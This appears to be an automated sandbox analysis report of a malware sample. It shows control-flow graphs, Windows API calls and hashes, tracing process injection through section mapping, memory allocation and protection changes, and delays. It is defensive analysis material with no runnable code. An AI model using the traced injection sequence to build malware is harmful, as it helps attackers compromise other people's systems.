                                                                                                                                                                      control_flow_graph 316 401587-4015b2 call 4011cd 320 4015b4 316->320 321 4015b7-4015bc 316->321 320->321 323 4015c2-4015d3 321->323 324 4018df-4018e7 321->324 328 4015d9-401602 323->328 329 4018dd 323->329 324->321 327 4018ec-40193b call 4011cd 324->327 328->329 336 401608-40161f NtDuplicateObject 328->336 329->327 336->329 338 401625-401649 NtCreateSection 336->338 340 4016a5-4016cb NtCreateSection 338->340 341 40164b-40166c NtMapViewOfSection 338->341 340->329 345 4016d1-4016d5 340->345 341->340 343 40166e-40168a NtMapViewOfSection 341->343 343->340 346 40168c-4016a2 343->346 345->329 348 4016db-4016fc NtMapViewOfSection 345->348 346->340 348->329 350 401702-40171e NtMapViewOfSection 348->350 350->329 353 401724 350->353 353->329 354 401724 call 401729 353->354 354->329
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
                                                                                                                                                                      • Instruction ID: c9324331886a871ff7b65cfc1a3adde32c11ca3f72b54674233341407885f4d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E511A71900249BBEB209F91CC48FEF7BB8EF85B00F144169F911AA2E5D7759945CB24
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 370 401729 371 40172b 370->371 372 40172f-40174d 370->372 371->372 373 40172d 371->373 383 401764 372->383 384 401755-401778 372->384 373->372 375 4016be-4016cb NtCreateSection 373->375 377 4016d1-4016d5 375->377 378 4018dd-40193b call 4011cd 375->378 377->378 381 4016db-4016fc NtMapViewOfSection 377->381 381->378 385 401702-40171e NtMapViewOfSection 381->385 383->384 396 40177b-4017b8 384->396 385->378 389 401724 385->389 389->378 391 401724 call 401729 389->391 391->378 412 4017ba-4017e3 396->412 417 4017e5-4017eb 412->417 418 4017ed 412->418 419 4017f3-4017f9 417->419 418->419 420 401809-40180d 419->420 421 4017fb-401807 419->421 420->419 422 40180f-401814 420->422 421->420 423 401816 call 40181b 422->423 424 40187c-40188b 422->424 425 40188e-401891 424->425 427 401893-40189d 425->427 428 4018bb-4018d4 425->428 429 4018a0-4018a9 427->429 428->378 430 4018b7 429->430 431 4018ab-4018b5 429->431 430->429 432 4018b9 430->432 431->430 432->425
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 33071139-0
                                                                                                                                                                      • Opcode ID: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
                                                                                                                                                                      • Instruction ID: bb29a515743844fa426f6922f48e3936f90c9c278b9ffb8c9c9d974ad6050a99
                                                                                                                                                                      • Opcode Fuzzy Hash: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
                                                                                                                                                                      • Instruction Fuzzy Hash: 69519272904104EBEB249A55CC44FAA77B5FF85700F24813BE842772F0D67C6942E65B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 433 81019d-8101b6 434 8101b8-8101ba 433->434 435 8101c1-8101cd CreateToolhelp32Snapshot 434->435 436 8101bc 434->436 437 8101dd-8101ea Module32First 435->437 438 8101cf-8101d5 435->438 436->435 439 8101f3-8101fb 437->439 440 8101ec-8101ed call 80fe5c 437->440 438->437 443 8101d7-8101db 438->443 444 8101f2 440->444 443->434 443->437 444->439
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008101C5
                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 008101E5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1709555486.000000000080D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_80d000_987123.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                      • Instruction ID: 6d599cebee2d778eea91c7775e2ee5cbcd1402da7bf2e06810efc3bbdf33031f
                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                      • Instruction Fuzzy Hash: F1F06D322007157BD7203AF9AC8DBAA76ECFF49764F100528EA46E14C0DBB4EC858A61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 42628b-426297 1 426299-42629f 0->1 2 426a03-426a0a 1->2 3 4262a5-4269fd VirtualProtect 1->3 2->1 4 426a10-426a15 2->4 3->2
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNELBASE(00000040,?,0BB7EA7B,?,?,52860AB1,?,?,34026A25), ref: 004269FD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID: )?u$:/X$F(+$O8##$R'._$U99x$X2R$dFfX$v;^:$o:?$6
                                                                                                                                                                      • API String ID: 544645111-975362989
                                                                                                                                                                      • Opcode ID: 35d728c95aa6d0a75f2c7cf45eec9f2d0d017f28882eafd102482a2d68368c15
                                                                                                                                                                      • Instruction ID: d72fbdaad144419308e756cdf284ac6d7789ac6a6b4f3aee9be819b8f8910974
                                                                                                                                                                      • Opcode Fuzzy Hash: 35d728c95aa6d0a75f2c7cf45eec9f2d0d017f28882eafd102482a2d68368c15
                                                                                                                                                                      • Instruction Fuzzy Hash: 4702EAB480536CDBDB20CF86EA857CCBBB0BB11704F6186D8D9196B214D7724A85CF89
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 5 72003c-720047 6 720049 5->6 7 72004c-720263 call 720a3f call 720e0f call 720d90 VirtualAlloc 5->7 6->7 22 720265-720289 call 720a69 7->22 23 72028b-720292 7->23 27 7202ce-7203c2 VirtualProtect call 720cce call 720ce7 22->27 24 7202a1-7202b0 23->24 26 7202b2-7202cc 24->26 24->27 26->24 34 7203d1-7203e0 27->34 35 7203e2-720437 call 720ce7 34->35 36 720439-7204b8 VirtualFree 34->36 35->34 38 7205f4-7205fe 36->38 39 7204be-7204cd 36->39 41 720604-72060d 38->41 42 72077f-720789 38->42 40 7204d3-7204dd 39->40 40->38 44 7204e3-720505 40->44 41->42 47 720613-720637 41->47 45 7207a6-7207b0 42->45 46 72078b-7207a3 42->46 56 720517-720520 44->56 57 720507-720515 44->57 49 7207b6-7207cb 45->49 50 72086e-7208be LoadLibraryA 45->50 46->45 51 72063e-720648 47->51 53 7207d2-7207d5 49->53 55 7208c7-7208f9 50->55 51->42 54 72064e-72065a 51->54 58 7207d7-7207e0 53->58 59 720824-720833 53->59 54->42 60 720660-72066a 54->60 61 720902-72091d 55->61 62 7208fb-720901 55->62 63 720526-720547 56->63 57->63 64 7207e2 58->64 65 7207e4-720822 58->65 67 720839-72083c 59->67 66 72067a-720689 60->66 62->61 68 72054d-720550 63->68 64->59 65->53 69 720750-72077a 66->69 70 72068f-7206b2 66->70 67->50 71 72083e-720847 67->71 73 7205e0-7205ef 68->73 74 720556-72056b 68->74 69->51 75 7206b4-7206ed 70->75 76 7206ef-7206fc 70->76 77 72084b-72086c 71->77 78 720849 71->78 73->40 79 72056f-72057a 74->79 80 72056d 74->80 75->76 81 72074b 76->81 82 7206fe-720748 76->82 77->67 78->50 84 72059b-7205bb 79->84 85 72057c-720599 79->85 80->73 81->66 82->81 89 7205bd-7205db 84->89 85->89 89->68
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0072024D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1708692549.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_720000_987123.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID: cess$kernel32.dll
                                                                                                                                                                      • API String ID: 4275171209-1230238691
                                                                                                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                      • Instruction ID: b8812dad7fe1ca0bb043ed187b53687dad4eb9db5f569f0ec4c3fa07ccda18af
                                                                                                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                      • Instruction Fuzzy Hash: 97527A74A00229DFDB64CF58D984BA8BBB1BF09304F1480D9E50DAB352DB34AE94DF64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 355 426f5c-426f6a 356 426f6c-426f76 355->356 357 426f78-426f79 SetConsoleOutputCP 356->357 358 426f7f-426f93 356->358 357->358 359 426f95-426fa8 SetFileAttributesW OpenWaitableTimerA 358->359 360 426fae-426faf 358->360 359->360 360->356 361 426fb1 360->361 362 426fb3-426fb9 361->362 363 426fca-426fd4 362->363 364 426fbb-426fc5 362->364 365 427010-427017 363->365 366 426fd6-427006 WriteConsoleOutputA 363->366 364->363 365->362 367 427019 call 426c1f 365->367 366->365 369 42701e-427024 367->369
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetConsoleOutputCP.KERNEL32(00000000), ref: 00426F79
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(0042A988,00000000), ref: 00426F9B
                                                                                                                                                                      • OpenWaitableTimerA.KERNEL32(00000000,00000000,0042A9B0), ref: 00426FA8
                                                                                                                                                                      • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00426FF9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleOutput$AttributesFileOpenTimerWaitableWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1436354611-0
                                                                                                                                                                      • Opcode ID: 62ed26e15b5a49391d8a23dc0cda7980fbfb03aaa03a303bc663d0258708f716
                                                                                                                                                                      • Instruction ID: 644fc488f5917a07c12c4052361495bd25380895930b253282537b45d16775f0
                                                                                                                                                                      • Opcode Fuzzy Hash: 62ed26e15b5a49391d8a23dc0cda7980fbfb03aaa03a303bc663d0258708f716
                                                                                                                                                                      • Instruction Fuzzy Hash: 5811E231A01225BFCF129BA9FD4599F7778FB01324B53553AE100A2160D7784A4ACF6D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 446 720e0f-720e24 SetErrorMode * 2 447 720e26 446->447 448 720e2b-720e2c 446->448 447->448
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,00720223,?,?), ref: 00720E19
                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,00720223,?,?), ref: 00720E1E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1708692549.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_720000_987123.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                      • Instruction ID: cfa6968bfae5348f77af3aa7adfeb525760b97280b12a26551987611985b10e1
                                                                                                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                      • Instruction Fuzzy Hash: BFD0123154512877D7003AA4DC09BCD7B1CDF05B62F008411FB0DD9081C774994046E5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 449 426a16-426a75 LoadLibraryA
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNELBASE(004361E8,00426EB5), ref: 00426A6F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                      • Opcode ID: 9e85f7e3211469c7aff70de8e8f6211f89e9375843a5db308750fb0cf86726ac
                                                                                                                                                                      • Instruction ID: 335214d8cf92d86652192826c7dd3f95ee96a184b7b7a1d6687d55eba145f56e
                                                                                                                                                                      • Opcode Fuzzy Hash: 9e85f7e3211469c7aff70de8e8f6211f89e9375843a5db308750fb0cf86726ac
                                                                                                                                                                      • Instruction Fuzzy Hash: 92F0CE1054C2D3E8EF52C368AD19B153E95132264CF5AA1BD81901A2A3CAEBC229C77E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 450 40193e-401947 451 40195e 450->451 452 40194f-40195a 450->452 451->452 453 401961-4019ae call 4011cd Sleep call 401452 451->453 452->453 464 4019b0-4019b8 call 401553 453->464 465 4019bd-401a03 call 4011cd 453->465 464->465
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                      • Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
                                                                                                                                                                      • Opcode Fuzzy Hash: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 479 40194a-4019ae call 4011cd Sleep call 401452 492 4019b0-4019b8 call 401553 479->492 493 4019bd-401a03 call 4011cd 479->493 492->493
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                      • Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
                                                                                                                                                                      • Opcode Fuzzy Hash: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                      • Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                      • Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                      • Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                      • Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
                                                                                                                                                                      • Opcode Fuzzy Hash: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                      • Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
                                                                                                                                                                      • Instruction ID: f592bab324d3cd5d6286c78059ef0a1e8702b22de7bd53a4ec4d5e19e7ef6e8c
                                                                                                                                                                      • Opcode Fuzzy Hash: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D0184B5208204EBDB006AC5DD62EBA3265AB44314F204537FA43791F1C57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0080FEAD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1709555486.000000000080D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_80d000_987123.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                      • Instruction ID: 9947d0dcb840cadd7ae5d599269f5f8666bbda25039d98c657654689a527b4ca
                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                      • Instruction Fuzzy Hash: E3113F79A00208EFDB01DF98C985E99BBF5EF08350F0580A4F9489B362D371EA90DF90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
                                                                                                                                                                      • Instruction ID: 68c2b1bb8267a16b47d2b790190fa602822f098e0b694be4ddc2e306b3be1968
                                                                                                                                                                      • Opcode Fuzzy Hash: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2AF086B5208204FADB006BD59D61EBA3768AB44354F204137BA13790F1C57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
